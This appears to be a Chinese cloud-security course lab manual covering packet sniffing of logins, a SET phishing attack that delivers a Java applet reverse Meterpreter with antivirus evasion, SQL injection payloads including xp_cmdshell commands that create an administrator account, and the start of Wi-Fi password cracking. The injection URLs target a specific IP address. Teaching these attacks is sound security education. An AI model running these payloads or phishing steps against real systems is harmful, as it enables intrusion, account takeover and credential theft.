《云计算安全》实验指导书docx
- 格式:pdf
- 大小:2.12 MB
- 文档页数:32
实验一:使用sniffer捕获加密包和非加密包
一、实验目的
使用Sniffer抓包工具进行网络抓包的练习
抓取加密与不加密两种数据包
分析并理解采用加密和不加密技术数据的传输状态。
二、实验设备
安装了sniffer的客户机;
可提供网络链接功能的服务器;
实验拓扑结构定义如下: Sniffer工作站(物理机)Web服务器(虚拟机)
三、实验内容
熟悉Sniffer网络抓包工具的使用。
使用Sniffer网络抓包工具抓取客户端与服务器端之间的通信包。访问服务器存放好的
两个版本的网页,分别为登录加密与登录不加密。
分析加密与不加密数据包之间的差异。
四、实验步骤
1、启动程序,在Setting对话框中,选择自己的NIC,单击OK
2、打开Capture选单,选择Define Filter,然后选择Address页
3、单击Profiles 按钮,创建新配置文件
4、在Capture Profiles对话框中,单击New
5、输入stXXXX(XXXX为学号)作为新配置文件名,单击
OK
6、选择stXXXX文件,然后单击Done按钮
7、单击Station 1 字段,输入本机的IP地址,单击Station 2字段,输入合作伙伴的IP地址
(或缺省为any)
8、将Address Type字段的值由硬件Hardware改为IP,然后,单击OK按钮返回主屏幕
9、单击start按钮,开始捕捉数据包
10、访问bbs,mail等(smail.tongji.edu.cn)
11、捕获到数据包之后,单击工具栏上的end and view按钮
12、仔细察看数据包,应该可以看到用户名和密码
13、访问加密过的mail(mail.yahoo.com.cn)等,重复以上步骤。
14、仔细察看数据包,由于数据包被加密,应该可以看不到用户名和密码。
实验二:社会工程学攻击
一、实验目的
掌握Java Applet Attack Method和Credential Harvester Attack Method社会工程学工
具的原理及使用
掌握社会工程学攻击的原理、攻击方法和攻击步骤
提高钓鱼网站识别能力,提高网络安全防范意识
二、实验设备
客户端主机:装有BackTrack5的PC;
目标主机:运行windows操作系统的PC
注:实验的两台主机需在同一网段下
三、实验内容
通过邮件,使用户点击访问BT5伪造的网站,诱骗用户在网页端执行java程序,使得
BT5能够得到该用户的信息和控制权。
四、实验步骤
1. 打开set的配置文件set_config进行配置
root@bt:/pentest/exploits/set/config#vi set_config)
1.1 配置METASPLOIT_PATH
1.2 配置EMAIL_PROVIDER
1.3 配置SELF_SIGNED_APPLET和JAVA_ID_PARAM
2. 打开set程序
(root@bt:/pentest/exploits/set # ./set)
2.1选择1 Socail-Engineering Attacks进行社会工程学攻击
2.2 选择2 Website Attach Vector
2.3 选择1 Java Applet Attack Method,进行java攻击
2.4选择2 Site Cloner,进行克隆网站
2.5输入签名所需的基本信息
2.6 输入网址:http://www.baidu.com对该网站进行克隆
2.7选2 Windows Reverse TCP Meterpreter
2.8选择16,在攻击程序外套个壳,用于穿越杀毒软件和防火墙。
2.9设置本地监听端口号,443的端口号穿越性好。
2.10 选1E-mail Attack Single Email Address
2.11填写邮件的收件地址,标题和内容
2.12 执行程序发送邮件
3. 用户收到邮件后,点击链接访问
3.1 打开邮箱查收邮件
3.2 访问邮件中的地址
3.3选择运行java程序
3.4 BT5服务器端连接用户,并在用户端创建notepad.exe进程
3.5 打开用户端任务管理器,发现notepad.exe
3.6 BT5中输入sessions –i1成功连接目标机器
实验三:SQL注入
一、实验目的
熟悉SQL注入攻击的一些基本步骤。
加深对SQL注入攻击各个阶段的理解。
提高读者对具体威胁的分析和防护能力。
二、实验设备
作为Web服务器的主机,提供登录页面,其后台数据库满足如下条件:
(1)数据库为Access
(2)程序没有对于id进行过滤
(3)数据库表中有个字段名为id
三、实验内容
通过手工注入获得后台管理权限
手动注入的各种常用SQL语句
手动注入探测出管理员账号和密码
四、实验步骤
1、判断能否进行SQL注入
http://210.34.17.178/displaynews.asp?id=772 and 1=1
http://210.34.17.178/displaynews.asp?id=772 and 1=2
如果1显示正常,2显示错误,或者没有页面, 则表明可以进行SQL注入。
2、判断数据库类型
http://210.34.17.178/displaynews.asp?id=772 and user>0
user是SQL Server的内置变量
1.and (select count(*) from sysobjects)>0
2.and (select count(*) from msysobjects)>0
如果1正常,则表示SQL server.
3、选择注入方法
(A) ID=49 这类注入的参数是数字型,SQL语句如下: Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件],即是生成语句:
Select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧这类注入的参数是字符型,SQL语句如下:
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’,即是生成语句:
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’,即是生成语句:
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’
4、猜表名
ID=49 And (Select Count(*) from Admin)>=0
表名猜出来后,将Count(*)替换成Count(字段名),
and (select top 1 len(username) from Admin)>0
猜用户名长度
and (select top 1 asc(mid(username,1,1)) from Admin)>0
猜用户名
5、利用系统表注入SQLServer数据库
id=1;exec master..xp_cmdshell “net user name password /add”
创建系统用户
Id=1;exec master..xp_cmdshell “net localgroup name administrators /add”
把该用户加入administrators组
id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’
备份数据库
实验四:无线密码破解
一、实验目的
使用BT5的破解指定路由器密码的具体流程
了解破解无线网络Aircrack-NG网络套件的使用
使用Aircrack-NG破解加密的无线网络密码
二、实验设备
装有BT5的主机
无线网卡:TP-LINK TL-WN821N
无线网卡驱动:Rtl8192
无线AccessPoint:NETGEAR 无线路由器
三、实验内容
通过无线网卡进行抓包,锁定需要破解的路由器
进行deauth攻击与指定路由器建立握手
通过暴力文件破解路由器密码
四、 实验步骤
1. 安装无线网卡驱动
(下载地址:http://www.aircrack-ng.org/doku.php?id=compat-wireless)
1.1 解压安装文件
(root@bt:~# tar xvjf compat-wireless-3.6.8-1.tar.bz2)